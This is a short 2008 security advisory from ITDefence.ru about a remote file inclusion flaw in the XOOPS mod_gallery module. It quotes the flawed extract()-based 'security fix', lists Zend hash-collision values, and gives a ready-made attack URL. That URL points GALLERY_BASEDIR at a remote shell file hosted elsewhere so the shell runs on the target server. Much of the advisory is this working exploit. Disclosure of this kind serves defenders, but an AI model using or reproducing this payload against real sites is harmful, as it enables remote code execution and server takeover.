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Posted on 07 January 2008

----[ XOOPS mod_gallery Zend_Hash_key + Extract RFI ... ITDefence.ru Antichat.ru ] XOOPS mod_gallery Zend_Hash_key + Extract REMOTE FILE INCLUDE Eugene Minaev underwater@itdefence.ru ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ \n/ . / /_// // / / __ /__/ / / / /_// / / / / / /___/ / / / / / / / / / / / / / / / / /__ //\n / ____________/ / / __________// /__ // / /\ \_______/ \________________/____/ 2007 /_//_/ // //\n \ // // / . \ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\________[________________________________________]_________//_//_/ . . Bug works only with register_globals = OFF . I find their security fix very fun , and you ? : ) <?php /* Begin Security Fix */ $scrubList = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_POST_FILES'); foreach ($scrubList as $outer) { foreach ($scrubList as $inner) { if (isset(${$outer}[$inner])) { unset(${$outer}[$inner]); } } } ....some php code... /* End Security Fix */ extract($_GET); extract($_POST); extract($_COOKIE); ?> Hah .. very serious security fix , yeah :) <?php if (substr(PHP_OS, 0, 3) == 'WIN') { require_once($GALLERY_BASEDIR . "platform/fs_win32.php"); } else { require_once($GALLERY_BASEDIR . "platform/fs_unix.php"); } ?> zend_hash_key_calc.exe GALLERY_BASEDIR GALLERY_BASEDIR PHP5 hash: -2093085906 PHP4 hash: -995617320 test.ru/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://path/to/m0nzt3r_shell.txt?&2093085906=1&995617320=2 ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]